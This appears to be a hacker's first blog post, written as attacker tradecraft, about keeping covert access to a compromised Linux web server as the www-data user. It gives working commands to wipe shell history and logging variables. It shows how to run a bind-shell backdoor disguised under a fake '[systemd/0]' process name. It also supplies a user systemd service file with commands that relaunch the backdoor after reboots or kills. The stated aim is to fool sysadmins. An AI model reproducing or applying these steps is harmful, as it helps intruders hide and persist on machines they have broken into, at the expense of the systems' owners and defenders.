a8888b.
d888888b.
8P"YP"Y88
8|o||o|88
8' .88
8`._.' Y8.
d/ `8b.
dP . Y8b.
d8:' " `::88b
d8" 'Y88b
:8P ' :888
8a. : _a88P
._/"Yaa_: .| 88P|
\ YP" `| 8P `.
/ \.___.d| .'
`--..__)8888P`._.'
┌───────────────────────────────────────────────────┐
| Non-Root Techniques |
\───────────────────────────────────────────────────/
|[0x1] Preventing logs
|[0x2] bind-shell & camouflage the process
|[0x3] Creating a backdoor in systemd
└───────────────────────────────────────────────────┘
[Menu]
Hello People, Today I'm going to explain some techniques that I use on a daily basis in stocks to make me persistent even though I'm an unprivileged user.
For this to be possible, I'm going to put myself in a situation where we're in an initial shell being a www-data user and let's think... how to leave a backdoor?
well being a user without many privileges we only have a home, and other things... anyway to have a decent persistence I recommend in some cases when you are sure
when the machine is on 24/7 it is recommended to leave your stuff in /dev/shm/ because that's where the shared ram data is located.
shm = shared memory well knowing this I will go by the information that you decided to put yourself in /dev/shm for this it is recommended to create a directory a + not always
but it's good to create something like /dev/shm/... or something relevant to that. It's important to remember, always clean up your tracks on a machine, I always like to unset
to remove environment variables that will generate logs as they are used.
[0x1] Preventing logs
┌───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┐
|www-data@server:~$ unset HISTFILE HISTSAVE HISTMOVE HISTZONE HISTORY HISTLOG USERHOST REMOTEHOST WATCH; history -n; export HISTFILE=/dev/null; history -c
└───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┘
To explain this code in a crude way, it would remove environment variables that generate logs such as the zsh bash history.
the history with the -n option is used to read all the commands from the history and load them into memory, but not to display them in the standard output.
export HISTFILE to /dev/null is just to dump my entire command log to /dev/null = empty.
and lastly history -c is to clear the history of the commands we typed previously :D
This way we have a safe, clean and trouble-free entrance
now how could we maintain a persistence as an unprivileged user? i'll cover 1 way of doing this below:
[0x2] bind-shell & camouflage the process
we can use several bind-shells, you can do it in several languages and approaches, I'll use one that I got from github as an example
let's think about it, I think that running backdoor.elf with the cmd appearing in ps aux is a bit crazy, don't you think?
knowing this let's try to mask the process using the power of linux itself! i'll show you in practice how to do this.
┌───────────────────────────────────────────────────────────────────────────────────────────────────────────┐
|www-data@server:~$ exec -a "[systemd/0]" ./backdoor & //executing with exec to change the process name
|www-data@server:~$ [1] 546739 //process pid
|www-data@server:~$ ps fHw //Checking the name change
| PID TTY STAT TIME COMMAND
|5422 pts/1 Ss+ 0:00 /usr/bin/zsh
|546739 pts/0 SN 0:00 [systemd/0] //Vuala!
|554847 pts/0 R+ 0:00 ps fHw
└───────────────────────────────────────────────────────────────────────────────────────────────────────────┘
I think it's kind of self-explanatory, the -a option being to replace the process name with another one, notice that I put the name as "[systemd/0]" because in standard unix-like processes
it's likely that there are processes that have the same name as [something] I put systemd/0 because systemd is something that already exists in the system and could be confused.
more easily :D
[0x3] Creating a backdoor in systemd
well, if you think the machine might crash and you're afraid of that happening and your backdoor going offline... you can create a systemd-service so that it stays active even after a machine reset
to make this possible we need to go to our user's home and create a directory in ~/.config called systemd para colocar nosso script de systemd la dentro.
our script will be as simple as possible to create a service that runs an executable in /var/www/.config/.../ called backdoor.elf and it will already hide the process with exec :D
let's put one the settings in ~/.config/systemd/user/backdoor.service
┌───────────────────────────────────────────────────────────────────────────────────────────────────────────┐
|[Unit]
|Description=cuttie backdoor
|After=network.target
|
|[Service]
|ExecStart=/bin/bash -c 'exec -a "[systemd/0]" /var/www/.config/.../backdoor.elf &'
|Restart=always
|RestartSec=3
|
|[Install]
|WantedBy=multi-user.target
└───────────────────────────────────────────────────────────────────────────────────────────────────────────┘
then we'll activate this systemd using the following commands:
┌───────────────────────────────────────────────────────────────────────────────────────────────────────────┐
|www-data@server:~$ systemctl --user daemon-reload //Updating user services
|www-data@server:~$ systemctl --user start backdoor //starting the service
|www-data@server:~$ systemctl --user enable backdoor //service to start automatically on boot
└───────────────────────────────────────────────────────────────────────────────────────────────────────────┘
by doing this if the machine shuts down or if the process is killed it will be re-created uwu, so that a dumb sysadmin will take a long time to realize and understand these attempts to figure out HuehuEhUe
that's it I guess... I hope to update this over time if I find a few more things.
this is my first blog post, I hope someone actually reads it... or not :D